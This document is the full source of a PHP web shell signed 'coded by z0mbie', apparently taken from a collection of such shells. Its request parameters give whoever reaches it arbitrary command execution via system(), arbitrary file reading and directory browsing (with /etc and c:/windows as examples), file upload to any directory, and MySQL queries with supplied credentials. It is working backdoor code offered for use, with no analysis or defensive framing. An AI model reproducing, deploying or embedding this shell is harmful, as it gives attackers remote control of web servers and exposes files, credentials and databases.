Access-Control-Allow-Origin: *<?// coded by z0mbie [30.08.03] | http://fre

1. Access-Control-Allow-Origin: *
2.  
3. <?
4. // coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
5.  
6. ob_implicit_flush();
7. if(isset($_REQUEST['f'])){
8. $filename=$_REQUEST['f'];
9. $file=fopen("$filename","rb");
10. fpassthru($file);
11. die;
12. }
13. if(isset($_REQUEST['d'])){
14. $d=$_REQUEST['d'];
15. echo "<pre>";
16. if ($handle = opendir("$d")) {
17. echo "<h2>listing of $d</h2>";
18. while ($dir = readdir($handle)){
19. if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
20. else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
21. echo "$dir\n";
22. echo "</font></a>";
23. }
24.  
25. } else echo "opendir() failed";
26. closedir($handle);
27. die ("<hr>");
28. }
29. if(isset($_REQUEST['c'])){
30. echo "<pre>";
31. system($_REQUEST['c']);
32. die;
33. }
34. if(isset($_REQUEST['upload'])){
35.  
36. if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
37. else $dir=$_REQUEST['dir'];
38. $fname=$HTTP_POST_FILES['file_name']['name'];
39. if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
40. die('file uploading error.');
41. }
42. if(isset($_REQUEST['mquery'])){
43.  
44. $host=$_REQUEST['host'];
45. $usr=$_REQUEST['usr'];
46. $passwd=$_REQUEST['passwd'];
47. $db=$_REQUEST['db'];
48. $mquery=$_REQUEST['mquery'];
49. mysql_connect("$host", "$usr", "$passwd") or
50. die("Could not connect: " . mysql_error());
51. mysql_select_db("$db");
52. $result = mysql_query("$mquery");
53. if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
54. while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
55. mysql_free_result($result);
56. die;
57. }
58. ?>
59. <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
60. <form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
61. upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
62. <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
63. <br>for example:
64. http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
65. or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
66. <hr>execute mysql query:
67. <form action="<? echo $PHP_SELF; ?>" METHOD=GET >
68. host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
69.  
70. database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
71. </form>
72.  
73. <!-- http://michaeldaw.org 2006 -->